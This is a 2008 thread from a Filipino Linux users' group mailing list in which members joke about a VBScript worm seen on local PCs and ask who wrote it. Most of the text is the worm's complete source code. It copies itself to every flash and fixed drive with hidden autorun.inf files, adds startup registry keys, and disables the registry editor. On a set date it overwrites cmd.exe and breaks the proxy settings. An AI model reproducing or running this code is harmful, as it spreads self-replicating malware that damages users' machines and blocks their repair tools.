It's because that script is quite popular among kiddies. It's been
propagated in IRC channels, and on some script download sites.
On Feb 12, 2008 6:02 PM, Archangel <[EMAIL PROTECTED]> wrote:
> hahhahhahaah i also find this script in my PC before i reformat only
> lahi lng sila in this line
>
> this script:
> rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO PC"
>
> on my PC
> rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE"
>
>
> On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
> > Obviously this is offtopic, since the guy's script can only
> > run in an OS which supports regedit.exe, wscript.exe and the
> > other MS-apps.
> >
> > Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
> > and then copy itself to them :D
> >
> > pretty harmless compared to the other naught scripts but nonetheless
> > still annoying :D
> >
> >
> > "DOHHGS Ni TAGA CDOC"
> >
> > Who wants to claim ownership for this script?
> > :D
> >
> > any takers?
> >
> >
> ---------------------------------------------------------------------------------------
> > 'THIS IS A MODIFIED VERSION BY: TTMS
> > 'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
> >
> > On Error Resume Next
> >
> > Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
> > flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
> >
> > mycmdfile = "cmd.exe"
> >
> > mydate = month(now()) & day(now())
> > myvbsalias = "TTMS" & mydate
> > myvbsfile = myvbsalias & ".dll.vbs"
> >
> > atr = "[autorun]" & vbCrLf & _
> > "shellexecute=wscript.exe " & myvbsfile
> >
> > Set fs = CreateObject("Scripting.FileSystemObject")
> >
> > Dim mf, text, size
> >
> > Set mf = fs.GetFile(WScript.ScriptFullname)
> >
> > size = mf.size
> > check = mf.Drive.drivetype
> >
> > Set text = mf.openastextstream(1, -2)
> >
> > Do While Not text.atendofstream
> > mysource = mysource & text.readline
> > mysource = mysource & vbCrLf
> > Loop
> >
> > Do
> > Set winpath = fs.GetSpecialFolder(0)
> >
> > Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
> >
> > tf.Write mysource
> > tf.Close
> >
> > Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> > tf.Attributes = 39
> >
> > If (mydate = "318") Then
> > Set winsyspath = fs.GetSpecialFolder(1)
> >
> > cmd = "@echo off" & vbCrLf & _
> > "wscript " & winpath & "\" & myvbsfile
> >
> > Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
> >
> > tf.Write cmd
> > tf.Close
> >
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyEnable", 1, "REG_DWORD"
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyServer", "0.0.0.0:80"
> >
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control
> > Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
> > End If
> >
> > For Each flashdrive In fs.drives
> > If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
> > flashdrive.Path <> "A:" Then
> > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
> > 2, True)
> >
> > tf.Write mysource
> > tf.Close
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> > tf.Attributes = 39
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2,
> > True)
> >
> > tf.Write atr
> > tf.Close
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> > tf.Attributes = 39
> > End If
> > Next
> >
> > Set rg = CreateObject("WScript.Shell")
> >
> > rg.RegWrite
> >
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> > 1, "REG_DWORD"
> >
> > rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO
> PC"
> >
> > rg.RegWrite
> >
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig",
> > winpath & "\" & myvbsfile
> > rg.RegWrite
> >
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
> > winpath & "\" & myvbsfile
> >
> >
> > If check <> 1 Then
> > WScript.sleep 200000
> > End If
> >
> > Loop While (check <> 1)
> >
> > Set sd = CreateObject("WScript.Shell")
> >
> > sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
> >
> > _________________________________________________
> > Kagay-Anon Linux Users' Group (KLUG) Mailing List
> > [email protected] (http://cdo.linux.org.ph)
> > Searchable Archives: http://archives.free.net.ph
> >
>
>
> --
> ArchAngel
> _________________________________________________
> Kagay-Anon Linux Users' Group (KLUG) Mailing List
> [email protected] (http://cdo.linux.org.ph)
> Searchable Archives: http://archives.free.net.ph
>
--
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com
Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,
sybase.public.ase.linux
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph
